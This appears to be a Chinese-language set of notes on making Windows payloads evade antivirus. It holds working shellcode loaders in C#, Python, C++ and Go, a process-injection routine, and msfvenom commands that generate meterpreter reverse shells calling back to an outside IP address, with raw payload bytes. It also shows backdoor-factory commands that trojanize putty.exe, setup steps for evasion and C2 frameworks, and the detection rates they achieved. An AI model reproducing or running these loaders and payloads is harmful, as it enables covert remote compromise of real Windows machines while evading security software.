C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /unsafe /platform:x86 /out:D:\test\InstallUtil-shell.exe D:\test\InstallUtil-ShellCode.cs

通过IInstallutil执行即可

C# xor shellcodewrapper

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
using System;
using System.IO;
using System.Collections.Generic;
using System.Text;
using System.Threading.Tasks;
using System.Security.Cryptography;
using System.Runtime.InteropServices;

namespace RunShellCode
{
    static class Program
    {
        //==============================================================================
        // CRYPTO FUNCTIONS
        //==============================================================================
        private static T[] SubArray<T>(this T[] data, int index, int length)
        {
            T[] result = new T[length];
            Array.Copy(data, index, result, 0, length);
            return result;
        }

        private static byte[] xor(byte[] cipher, byte[] key) {
            byte[] decrypted = new byte[cipher.Length];

            for(int i = 0; i < cipher.Length; i++) {
                decrypted[i] = (byte) (cipher[i] ^ key[i % key.Length]);
            }

            return decrypted;
        }

        //--------------------------------------------------------------------------------------------------
        // Decrypts the given a plaintext message byte array with a given 128 bits key
        // Returns the unencrypted message
        //--------------------------------------------------------------------------------------------------
        private static byte[] aesDecrypt(byte[] cipher, byte[] key)
        {
            var IV = cipher.SubArray(0, 16);
            var encryptedMessage = cipher.SubArray(16, cipher.Length - 16);

            // Create an AesManaged object with the specified key and IV.
            using (AesManaged aes = new AesManaged())
            {
                aes.Padding = PaddingMode.PKCS7;
                aes.KeySize = 128;
                aes.Key = key;
                aes.IV = IV;

                using (MemoryStream ms = new MemoryStream())
                {
                    using (CryptoStream cs = new CryptoStream(ms, aes.CreateDecryptor(), CryptoStreamMode.Write))
                    {
                        cs.Write(encryptedMessage, 0, encryptedMessage.Length);
                    }

                    return ms.ToArray();
                }
            }
        }

        //==============================================================================
        // MAIN FUNCTION
        //==============================================================================
        static void Main()
        {
            byte[] encryptedShellcode = new byte[] { 0x8d,0x81,0xec,0x67,0x71,0x69,0x0e,0xee,0x94,0x58,0xae,0x03,0xfa,0x39,0x5e,0xec,0x23,0x65,0xe5,0x35,0x65,0xe2,0x1c,0x4f,0x7e,0xde,0x24,0x41,0x40,0x96,0xc2,0x5b,0x10,0x15,0x6c,0x4b,0x51,0xa8,0xa1,0x6a,0x70,0xae,0x8c,0x95,0x23,0x3e,0xe5,0x35,0x61,0xe2,0x24,0x5b,0xfa,0x25,0x7f,0x1f,0x92,0x21,0x6f,0xb6,0x20,0xe2,0x37,0x47,0x70,0xba,0xe5,0x2e,0x69,0x8a,0x54,0x2e,0xfa,0x5d,0xe5,0x66,0xa7,0x58,0x91,0xcb,0xb0,0xa6,0x63,0x66,0xb6,0x51,0x8e,0x12,0x87,0x6a,0x13,0x9f,0x4a,0x14,0x4a,0x12,0x95,0x31,0xe5,0x3f,0x55,0x68,0xbd,0x01,0xfa,0x65,0x25,0xec,0x29,0x75,0x6f,0xb4,0xfa,0x6d,0xe5,0x66,0xa1,0xe0,0x2a,0x43,0x55,0x32,0x35,0x06,0x28,0x33,0x3f,0x98,0x91,0x36,0x31,0x3d,0xfa,0x7b,0x85,0xea,0x2c,0x01,0x5d,0x55,0x71,0x69,0x06,0x10,0x02,0x5b,0x31,0x33,0x19,0x25,0x19,0x41,0x76,0xe0,0x86,0x98,0xa1,0xd1,0xfe,0x66,0x71,0x69,0x47,0xa3,0x25,0x39,0x06,0x4e,0xf1,0x02,0x6e,0x98,0xa4,0x03,0x64,0x0f,0xb1,0xc1,0xc0,0xe9,0x19,0x6b,0x6e,0x76,0x2d,0xe0,0x88,0x37,0x21,0x39,0x3e,0x27,0x21,0x29,0x3e,0x0f,0x9b,0x66,0xb1,0x87,0x8e,0xbc,0xf9,0x0d,0x61,0x3f,0x39,0x0f,0xe8,0xcc,0x1a,0x06,0x8e,0xbc,0xeb,0xa7,0x05,0x63,0x91,0x29,0x79,0x1c,0x82,0x8f,0x16,0x69,0x6e,0x67,0x1b,0x69,0x04,0x63,0x27,0x3e,0x06,0x65,0xa8,0xa1,0x31,0x98,0xa4,0xea,0x96,0x67,0x0f,0x5f,0xe5,0x51,0x1b,0x29,0x06,0x67,0x61,0x69,0x6e,0x31,0x1b,0x69,0x06,0x3f,0xd5,0x3a,0x8b,0x98,0xa4,0xfa,0x3d,0x0d,0x71,0x3f,0x3d,0x30,0x19,0x6b,0xb7,0xaf,0x2e,0x96,0xbb,0xe4,0x89,0x69,0x13,0x4f,0x29,0x01,0x6e,0x27,0x71,0x69,0x04,0x67,0x21,0x01,0x65,0x48,0x7e,0x59,0x91,0xb2,0x26,0x01,0x1b,0x09,0x3c,0x08,0x91,0xb2,0x2f,0x37,0x91,0x6b,0x55,0x66,0xeb,0x17,0x8e,0x96,0x91,0x8e,0xea,0x96,0x91,0x98,0x70,0xaa,0x47,0xa1,0x04,0xa8,0xad,0xdc,0x81,0xdc,0xcc,0x31,0x1b,0x69,0x3d,0x98,0xa4 };
            string key = "qing";
            string cipherType = "xor";


            byte[] shellcode = null;

            //--------------------------------------------------------------
            // Decrypt the shellcode
            if (cipherType == "xor") {
                shellcode = xor(encryptedShellcode, Encoding.ASCII.GetBytes(key));
            }
            else if (cipherType == "aes") {
                shellcode = aesDecrypt(encryptedShellcode, Convert.FromBase64String(key));
            }

            //--------------------------------------------------------------            
            // Copy decrypted shellcode to memory
            UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
            Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length);
            IntPtr hThread = IntPtr.Zero;
            UInt32 threadId = 0;

            // Prepare data
            IntPtr pinfo = IntPtr.Zero;

            // Invoke the shellcode
            hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
            WaitForSingleObject(hThread, 0xFFFFFFFF);
            return;
        }

        private static UInt32 MEM_COMMIT = 0x1000;
        private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;

        // The usual Win32 API trio functions: VirtualAlloc, CreateThread, WaitForSingleObject
        [DllImport("kernel32")]
        private static extern UInt32 VirtualAlloc(
            UInt32 lpStartAddr,
            UInt32 size,
            UInt32 flAllocationType,
            UInt32 flProtect
        );

        [DllImport("kernel32")]
        private static extern IntPtr CreateThread(
            UInt32 lpThreadAttributes,
            UInt32 dwStackSize,
            UInt32 lpStartAddress,
            IntPtr param,
            UInt32 dwCreationFlags,
            ref UInt32 lpThreadId
        );

        [DllImport("kernel32")]
        private static extern UInt32 WaitForSingleObject(
            IntPtr hHandle,
            UInt32 dwMilliseconds
        );
    }
}

py Base64(k8)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
import ctypes
import sys
import base64
#calc.exe
#REJDM0Q5NzQyNEY0QkVFODVBMjcxMzVGMzFDOUIxMzMzMTc3MTc4M0M3MDQwMzlGNDlDNUU2QTM4NjgwMDk1QjU3RjM4MEJFNjYyMUY2Q0JEQkY1N0M5OUQ3N0VEMDA5NjNGMkZEM0VDNEI5REI3MUQ1MEZFNEREMTUxMTk4MUY0QUYxQTFEMDlGRjBFNjBDNkZBMEJGNUJDMjU1Q0IxOURGNTQxQjE2NUYyRjFFRTgxNDg1MjEzODg0OTI2QUEwQUVGRDRBRDE2MzFFQjY5ODA4RDU0QzFCRDkyN0FDMkEyNUVCOTM4M0E4RjVENDIzNTM4MDJFNTBFRTkzRjQyQjM0MTFFOThCQkY4MUM5MkExMzU3OTkyMEQ4MTNDNTI0REZGMDdENTA1NEY3NTFEMTJFREM3NUJBRjU3RDJGNjY1QjgxMkZDRTA0MjczQkZDNTE1MTY2NkFBN0QzMUNEM0E3RUIxRTczQzBEQTk1MUM5N0UyN0Y1OTY3QTkyMkNCRTA3NEI3NEU2RDg3NkQ4Qzg4MDQ4NDZDNkYxNEVENjkyQjkyMUQwMzI0NzcyMkIwNDU1MjQxNTdENjNFQThGMjVFQTRCNA==
shellcode=bytearray(base64.b64decode(sys.argv[1]).decode("hex"))
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
                                          ctypes.c_int(len(shellcode)),
                                          ctypes.c_int(0x3000),
                                          ctypes.c_int(0x40))

buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)

ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),
                                     buf,
                                     ctypes.c_int(len(shellcode)))

ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
                                         ctypes.c_int(0),
                                         ctypes.c_int(ptr),
                                         ctypes.c_int(0),
                                         ctypes.c_int(0),
                                         ctypes.pointer(ctypes.c_int(0)))

ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))

py 十六进制

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
import ctypes
import sys
#calc.exe
#sc = "DBC3D97424F4BEE85A27135F31C9B13331771783C704039F49C5E6A38680095B57F380BE6621F6CBDBF57C99D77ED00963F2FD3EC4B9DB71D50FE4DD1511981F4AF1A1D09FF0E60C6FA0BF5BC255CB19DF541B165F2F1EE81485213884926AA0AEFD4AD1631EB69808D54C1BD927AC2A25EB9383A8F5D42353802E50EE93F42B3411E98BBF81C92A13579920D813C524DFF07D5054F751D12EDC75BAF57D2F665B812FCE04273BFC5151666AA7D31CD3A7EB1E73C0DA951C97E27F5967A922CBE074B74E6D876D8C8804846C6F14ED692B921D03247722B045524157D63EA8F25EA4B4"
shellcode=bytearray(sys.argv[1].decode("hex"))
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
                                          ctypes.c_int(len(shellcode)),
                                          ctypes.c_int(0x3000),
                                          ctypes.c_int(0x40))

buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)

ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),
                                     buf,
                                     ctypes.c_int(len(shellcode)))

ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
                                         ctypes.c_int(0),
                                         ctypes.c_int(ptr),
                                         ctypes.c_int(0),
                                         ctypes.c_int(0),
                                         ctypes.pointer(ctypes.c_int(0)))

ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))

shellcode_encoder

  • shellcode_encoder

windows下无法运行,须在linux下运行

举例msfvenom

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
root@kali:~# msfvenom -l encoder

Framework Encoders [--encoder <value>]
======================================

    Name                          Rank       Description
    ----                          ----       -----------
    cmd/brace                     low        Bash Brace Expansion Command Encoder
    cmd/echo                      good       Echo Command Encoder
    cmd/generic_sh                manual     Generic Shell Variable Substitution Command Encoder
    cmd/ifs                       low        Bourne ${IFS} Substitution Command Encoder
    cmd/perl                      normal     Perl Command Encoder
    cmd/powershell_base64         excellent  Powershell Base64 Command Encoder
    cmd/printf_php_mq             manual     printf(1) via PHP magic_quotes Utility Command Encoder
    generic/eicar                 manual     The EICAR Encoder
    generic/none                  normal     The "none" Encoder
    mipsbe/byte_xori              normal     Byte XORi Encoder
    mipsbe/longxor                normal     XOR Encoder
    mipsle/byte_xori              normal     Byte XORi Encoder
    mipsle/longxor                normal     XOR Encoder
    php/base64                    great      PHP Base64 Encoder
    ppc/longxor                   normal     PPC LongXOR Encoder
    ppc/longxor_tag               normal     PPC LongXOR Encoder
    ruby/base64                   great      Ruby Base64 Encoder
    sparc/longxor_tag             normal     SPARC DWORD XOR Encoder
    x64/xor                       normal     XOR Encoder
    x64/xor_context               normal     Hostname-based Context Keyed Payload Encoder
    x64/xor_dynamic               normal     Dynamic key XOR Encoder
    x64/zutto_dekiru              manual     Zutto Dekiru
    x86/add_sub                   manual     Add/Sub Encoder
    x86/alpha_mixed               low        Alpha2 Alphanumeric Mixedcase Encoder
    x86/alpha_upper               low        Alpha2 Alphanumeric Uppercase Encoder
    x86/avoid_underscore_tolower  manual     Avoid underscore/tolower
    x86/avoid_utf8_tolower        manual     Avoid UTF8/tolower
    x86/bloxor                    manual     BloXor - A Metamorphic Block Based XOR Encoder
    x86/bmp_polyglot              manual     BMP Polyglot                                                           
    x86/call4_dword_xor           normal     Call+4 Dword XOR Encoder                                                          
    x86/context_cpuid             manual     CPUID-based Context Keyed Payload Encoder                                         
    x86/context_stat              manual     stat(2)-based Context Keyed Payload Encoder                                       
    x86/context_time              manual     time(2)-based Context Keyed Payload Encoder                                          
    x86/countdown                 normal     Single-byte XOR Countdown Encoder
    x86/fnstenv_mov               normal     Variable-length Fnstenv/mov Dword XOR Encoder
    x86/jmp_call_additive         normal     Jump/Call XOR Additive Feedback Encoder
    x86/nonalpha                  low        Non-Alpha Encoder
    x86/nonupper                  low        Non-Upper Encoder
    x86/opt_sub                   manual     Sub Encoder (optimised)
    x86/service                   manual     Register Service
    x86/shikata_ga_nai            excellent  Polymorphic XOR Additive Feedback Encoder
    x86/single_static_bit         manual     Single Static Bit
    x86/unicode_mixed             manual     Alpha2 Alphanumeric Unicode Mixedcase Encoder
    x86/unicode_upper             manual     Alpha2 Alphanumeric Unicode Uppercase Encoder
    x86/xor_dynamic               normal     Dynamic key XOR Encoder

使用模板和编码器

1
2
3
msfvenom -p windows/shell_reverse_tcp -x /usr/share/windows-binaries/plink.exe lhost=1.1.1.1 lport=4444 -a x86 --platform win -f exe -o a.exe 

msfvenom -p windows/shell/bind_tcp -x /usr/share/windows-binaries/plink.exe lhost=1.1.1.1 lport=4444 -e x86/shikata_ga_nai -i 5 -a x86 -platform win -f exe > b.exe

Invoke-Obfuscation

  • Invoke-Obfuscation

安装-管理员权限下运行:

1
2
3
Set-ExecutionPolicy Unrestricted
Import-Module ./Invoke-Obfuscation.psd1
Invoke-Obfuscation
1
Invoke-Obfuscation -ScriptBlock {echo xss} -Command 'Encoding\1,Launcher\PS\67' -Quiet

the-backdoor-factory

  • the-backdoor-factory

apt-get install backdoor-factory

BDF中-F参数实现多裂缝注入。

1
2
3
backdoor-factory -f putty.exe -s show

backdoor-factory -f putty.exe -s iat_reverse_tcp_stager_threaded -H 192.168.15.135 -P 4444

正常进程注入shellcode

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
#include "stdafx.h"
#include <Windows.h>
#include <stdio.h>
#include "iostream"
using namespace std;
    unsigned char shellcode[] =
        "\xb8\x72\xd9\xb8\x52\xda\xd8\xd9\x74\x24\xf4\x5a\x2b\xc9\xb1"
        "\x56\x83\xc2\x04\x31\x42\x0f\x03\x42\x7d\x3b\x4d\xae\x69\x39"
        "\xae\x4f\x69\x5e\x26\xaa\x58\x5e\x5c\xbe\xca\x6e\x16\x92\xe6"
        "\x05\x7a\x07\x7d\x6b\x53\x28\x36\xc6\x85\x07\xc7\x7b\xf5\x06"
        "\x4b\x86\x2a\xe9\x72\x49\x3f\xe8\xb3\xb4\xb2\xb8\x6c\xb2\x61"
        "\x2d\x19\x8e\xb9\xc6\x51\x1e\xba\x3b\x21\x21\xeb\xed\x3a\x78"
        "\x2b\x0f\xef\xf0\x62\x17\xec\x3d\x3c\xac\xc6\xca\xbf\x64\x17"
        "\x32\x13\x49\x98\xc1\x6d\x8d\x1e\x3a\x18\xe7\x5d\xc7\x1b\x3c"
        "\x1c\x13\xa9\xa7\x86\xd0\x09\x0c\x37\x34\xcf\xc7\x3b\xf1\x9b"
        "\x80\x5f\x04\x4f\xbb\x5b\x8d\x6e\x6c\xea\xd5\x54\xa8\xb7\x8e"
        "\xf5\xe9\x1d\x60\x09\xe9\xfe\xdd\xaf\x61\x12\x09\xc2\x2b\x7a"
        "\xfe\xef\xd3\x7a\x68\x67\xa7\x48\x37\xd3\x2f\xe0\xb0\xfd\xa8"
        "\x71\xd6\xfd\x67\x39\xb7\x03\x88\x39\x91\xc7\xdc\x69\x89\xee"
        "\x5c\xe2\x49\x0e\x89\x9e\x43\x98\xf2\xf6\xfa\xdc\x9b\x04\x03"
        "\xcc\x07\x81\xe5\xbe\xe7\xc1\xb9\x7e\x58\xa1\x69\x17\xb2\x2e"
        "\x55\x07\xbd\xe5\xfe\xa2\x52\x53\x56\x5b\xca\xfe\x2c\xfa\x13"
        "\xd5\x48\x3c\x9f\xdf\xad\xf3\x68\xaa\xbd\xe4\x0e\x54\x3e\xf5"
        "\xba\x54\x54\xf1\x6c\x03\xc0\xfb\x49\x63\x4f\x03\xbc\xf0\x88"
        "\xfb\x41\xc0\xe3\xca\xd7\x6c\x9c\x32\x38\x6c\x5c\x65\x52\x6c"
        "\x34\xd1\x06\x3f\x21\x1e\x93\x2c\xfa\x8b\x1c\x04\xae\x1c\x75"
        "\xaa\x89\x6b\xda\x55\xfc\xef\x1d\xa9\x82\xc7\x85\xc1\x7c\x58"
        "\x36\x11\x17\x58\x66\x79\xec\x77\x89\x49\x0d\x52\xc2\xc1\x84"
        "\x33\xa0\x70\x98\x19\x64\x2c\x99\xae\xbd\xdf\xe0\xdf\x42\x20"
        "\x15\xf6\x26\x21\x15\xf6\x58\x1e\xc3\xcf\x2e\x61\xd7\x6b\x20"
        "\xd4\x7a\xdd\xab\x16\x28\x1d\xfe";


    BOOL injection()
    {
        wchar_t Cappname[MAX_PATH] = { 0 };
        STARTUPINFO si;
        PROCESS_INFORMATION pi;
        LPVOID lpMalwareBaseAddr;
        LPVOID lpnewVictimBaseAddr;
        HANDLE hThread;
        DWORD dwExitCode;
        BOOL bRet = FALSE;

        lpMalwareBaseAddr = shellcode;

        GetSystemDirectory(Cappname, MAX_PATH);
        _tcscat(Cappname, L"\\calc.exe");
        printf("Injection program Name:%S\r\n", Cappname);

        ZeroMemory(&si, sizeof(si));
        si.cb = sizeof(si);
        ZeroMemory(&pi, sizeof(pi));

        if (CreateProcess(Cappname, NULL, NULL, NULL,
            FALSE, CREATE_SUSPENDED
            , NULL, NULL, &si, &pi) == 0)
        {
            return bRet;
        }

        lpnewVictimBaseAddr = VirtualAllocEx(pi.hProcess
            , NULL, sizeof(shellcode) + 1, MEM_COMMIT | MEM_RESERVE,
            PAGE_EXECUTE_READWRITE);

        if (lpnewVictimBaseAddr == NULL)
        {
            return bRet;
        }

        WriteProcessMemory(pi.hProcess, lpnewVictimBaseAddr,
            (LPVOID)lpMalwareBaseAddr, sizeof(shellcode) + 1, NULL);

        hThread = CreateRemoteThread(pi.hProcess, 0, 0,
            (LPTHREAD_START_ROUTINE)lpnewVictimBaseAddr, NULL, 0, NULL);

        WaitForSingleObject(pi.hThread, INFINITE);
        GetExitCodeProcess(pi.hProcess, &dwExitCode);
        TerminateProcess(pi.hProcess, 0);
        return bRet;
    }

    void help(char* proc)
    {
        printf("%s:[-] start a process and injection shellcode to memory\r\n", proc);
    }

    int main(int argc, char* argv[])
    {
        help(argv[0]);
        injection();
    }

golang加载异或的shellcode

msfvenom生成一段shellcode

1
msfvenom -p windows/x64/meterpreter/reverse_tcp -f num LHOST=45.32.137.154 LPORT=3356
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xcc, 0x00, 0x00, 0x00, 0x41, 0x51, 0x41, 0x50, 0x52, 
0x51, 0x56, 0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52, 0x60, 0x48, 0x8b, 0x52, 0x18, 0x48, 
0x8b, 0x52, 0x20, 0x48, 0x8b, 0x72, 0x50, 0x48, 0x0f, 0xb7, 0x4a, 0x4a, 0x4d, 0x31, 0xc9, 
0x48, 0x31, 0xc0, 0xac, 0x3c, 0x61, 0x7c, 0x02, 0x2c, 0x20, 0x41, 0xc1, 0xc9, 0x0d, 0x41, 
0x01, 0xc1, 0xe2, 0xed, 0x52, 0x41, 0x51, 0x48, 0x8b, 0x52, 0x20, 0x8b, 0x42, 0x3c, 0x48, 
0x01, 0xd0, 0x66, 0x81, 0x78, 0x18, 0x0b, 0x02, 0x0f, 0x85, 0x72, 0x00, 0x00, 0x00, 0x8b, 
0x80, 0x88, 0x00, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x74, 0x67, 0x48, 0x01, 0xd0, 0x50, 0x8b, 
0x48, 0x18, 0x44, 0x8b, 0x40, 0x20, 0x49, 0x01, 0xd0, 0xe3, 0x56, 0x48, 0xff, 0xc9, 0x41, 
0x8b, 0x34, 0x88, 0x48, 0x01, 0xd6, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0, 0xac, 0x41, 0xc1, 
0xc9, 0x0d, 0x41, 0x01, 0xc1, 0x38, 0xe0, 0x75, 0xf1, 0x4c, 0x03, 0x4c, 0x24, 0x08, 0x45, 
0x39, 0xd1, 0x75, 0xd8, 0x58, 0x44, 0x8b, 0x40, 0x24, 0x49, 0x01, 0xd0, 0x66, 0x41, 0x8b, 
0x0c, 0x48, 0x44, 0x8b, 0x40, 0x1c, 0x49, 0x01, 0xd0, 0x41, 0x8b, 0x04, 0x88, 0x48, 0x01, 
0xd0, 0x41, 0x58, 0x41, 0x58, 0x5e, 0x59, 0x5a, 0x41, 0x58, 0x41, 0x59, 0x41, 0x5a, 0x48, 
0x83, 0xec, 0x20, 0x41, 0x52, 0xff, 0xe0, 0x58, 0x41, 0x59, 0x5a, 0x48, 0x8b, 0x12, 0xe9, 
0x4b, 0xff, 0xff, 0xff, 0x5d, 0x49, 0xbe, 0x77, 0x73, 0x32, 0x5f, 0x33, 0x32, 0x00, 0x00, 
0x41, 0x56, 0x49, 0x89, 0xe6, 0x48, 0x81, 0xec, 0xa0, 0x01, 0x00, 0x00, 0x49, 0x89, 0xe5, 
0x49, 0xbc, 0x02, 0x00, 0x0d, 0x1c, 0x2d, 0x20, 0x89, 0x9a, 0x41, 0x54, 0x49, 0x89, 0xe4, 
0x4c, 0x89, 0xf1, 0x41, 0xba, 0x4c, 0x77, 0x26, 0x07, 0xff, 0xd5, 0x4c, 0x89, 0xea, 0x68, 
0x01, 0x01, 0x00, 0x00, 0x59, 0x41, 0xba, 0x29, 0x80, 0x6b, 0x00, 0xff, 0xd5, 0x6a, 0x0a, 
0x41, 0x5e, 0x50, 0x50, 0x4d, 0x31, 0xc9, 0x4d, 0x31, 0xc0, 0x48, 0xff, 0xc0, 0x48, 0x89, 
0xc2, 0x48, 0xff, 0xc0, 0x48, 0x89, 0xc1, 0x41, 0xba, 0xea, 0x0f, 0xdf, 0xe0, 0xff, 0xd5, 
0x48, 0x89, 0xc7, 0x6a, 0x10, 0x41, 0x58, 0x4c, 0x89, 0xe2, 0x48, 0x89, 0xf9, 0x41, 0xba, 
0x99, 0xa5, 0x74, 0x61, 0xff, 0xd5, 0x85, 0xc0, 0x74, 0x0a, 0x49, 0xff, 0xce, 0x75, 0xe5, 
0xe8, 0x93, 0x00, 0x00, 0x00, 0x48, 0x83, 0xec, 0x10, 0x48, 0x89, 0xe2, 0x4d, 0x31, 0xc9, 
0x6a, 0x04, 0x41, 0x58, 0x48, 0x89, 0xf9, 0x41, 0xba, 0x02, 0xd9, 0xc8, 0x5f, 0xff, 0xd5, 
0x83, 0xf8, 0x00, 0x7e, 0x55, 0x48, 0x83, 0xc4, 0x20, 0x5e, 0x89, 0xf6, 0x6a, 0x40, 0x41, 
0x59, 0x68, 0x00, 0x10, 0x00, 0x00, 0x41, 0x58, 0x48, 0x89, 0xf2, 0x48, 0x31, 0xc9, 0x41, 
0xba, 0x58, 0xa4, 0x53, 0xe5, 0xff, 0xd5, 0x48, 0x89, 0xc3, 0x49, 0x89, 0xc7, 0x4d, 0x31, 
0xc9, 0x49, 0x89, 0xf0, 0x48, 0x89, 0xda, 0x48, 0x89, 0xf9, 0x41, 0xba, 0x02, 0xd9, 0xc8, 
0x5f, 0xff, 0xd5, 0x83, 0xf8, 0x00, 0x7d, 0x28, 0x58, 0x41, 0x57, 0x59, 0x68, 0x00, 0x40, 
0x00, 0x00, 0x41, 0x58, 0x6a, 0x00, 0x5a, 0x41, 0xba, 0x0b, 0x2f, 0x0f, 0x30, 0xff, 0xd5, 
0x57, 0x59, 0x41, 0xba, 0x75, 0x6e, 0x4d, 0x61, 0xff, 0xd5, 0x49, 0xff, 0xce, 0xe9, 0x3c, 
0xff, 0xff, 0xff, 0x48, 0x01, 0xc3, 0x48, 0x29, 0xc6, 0x48, 0x85, 0xf6, 0x75, 0xb4, 0x41, 
0xff, 0xe7, 0x58, 0x6a, 0x00, 0x59, 0x49, 0xc7, 0xc2, 0xf0, 0xb5, 0xa2, 0x56, 0xff, 0xd5

首先使用golang将shellcode异或一下,代码见go-xor-shell

编译之后执行没有shell弹回?(failed)

.cpp shellcode加载器(failed)

msfvenom生成一段shellcode

1
2
3
4
5
6
7
8
msfvenom -p windows/meterpreter_reverse_tcp LHOST=45.32.137.154 LPORT=3356 > raw.bin

head -c 100 raw.bin | xxd

hexdump -v -e '"\\""x" 1/1 "%02x" ""' raw.bin >> hex_format

head -c 100 hex_format
\x4d\x5a\xe8\x00\x00\x00\x00\x5b\x52\x45\x55\x89\xe5\x81\xc3\xd6\x42\x00\x00\xff\xd3\x81\xc3\x23\x69

kali中编译

1
i686-w64-mingw32-c++ sc-launcher.cpp -o sclauncher.exe

c源码见cpp-shellcode

嵌入shellcode编译好后,运行失败,没有shell回弹

HERCULES

安装:

1
2
3
4
5
6
7
8
先从Github上克隆到本地
https://github.com/EgeBalci/HERCULES

安装依赖
go get github.com/fatih/color

执行安装
go run Setup.go

HERCULES/src/EGESPLOIT/RSE/BypassAV.go文件,使用了传统的添加花指令的方式进行免杀。

  • 使用

傻瓜式生成

火绒查杀

外网msf成功弹回可执行的交互式shell

virustotal 27/71

可根据源代码自行改编完善,或者改编源码

免杀效果较好

Slackor

  • Slackor

说明:The server was designed to run on Kali Linux. The agent is compiled for Windows, Mac, and Linux, but has primarily been tested with Windows 10

安装及部署

first login slack

  • A Slack Workspace

  • Register an app with the following permissions:

https://api.slack.com/apps

1
2
3
4
5
channels:read
channels:history
channels:write
files:write:user
files:read
  • Create a bot

外网kali及虚拟机kali都部署

1
2
3
4
5
go get github.com/Coalfire-Research/Slackor
cd $GOPATH/src/github.com/Coalfire-Research/Slackor
Run install.sh
Run setup.py
Supply the OAuth Access Token and Bot User OAuth Access Token from your app

setup.py添加OAuth Tokens时候出错,无法使用slack server进行流量通信
源码及实现原理可以学习

ARCANUS

  • ARCANUS

ARCANUS is a customized payload generator/handler

傻瓜式操作

ip: 45.32.137.154
port: 3344

未加upx的payload能过火绒

查杀率: 15/68

加upx后查杀率: 14/68

效果好,支持平台多,实用。

TheFatRat

  • TheFatRat

安装

1
2
3
4
5
git clone https://github.com/Screetsec/TheFatRat

cd TheFatRat

chmod +x setup.sh && ./setup.sh

缺少组件或者组件版本不对运行失败,要在老版本kali运行

avoidz

新版kali安装依赖时出错

zirikatu

  • zirikatu

直接./使用sh脚本即可

傻瓜式操作即可

windows/x64/meterpreter/reverse_tcp

ip: 45.32.137.154

port: 5566

未加壳被火绒查杀,无法加壳

查杀率: 38/67

免杀能力一般

AVIator

  • AVIator

使用运行exe即可

msf生成最基础的shellcode

1
msfvenom -p windows/meterpreter/reverse_https LHOST=45.32.137.154 LPORT=5566  -f csharp -o test.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
root@kali:~/test# cat test.c 
byte[] buf = new byte[535] {
0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,
0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,
0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf2,0x52,
0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x01,0xd1,
0x51,0x8b,0x59,0x20,0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,
0x01,0xd6,0x31,0xff,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf6,0x03,
0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,
0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,
0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,
0x8d,0x5d,0x68,0x6e,0x65,0x74,0x00,0x68,0x77,0x69,0x6e,0x69,0x54,0x68,0x4c,
0x77,0x26,0x07,0xff,0xd5,0x31,0xdb,0x53,0x53,0x53,0x53,0x53,0xe8,0x3e,0x00,
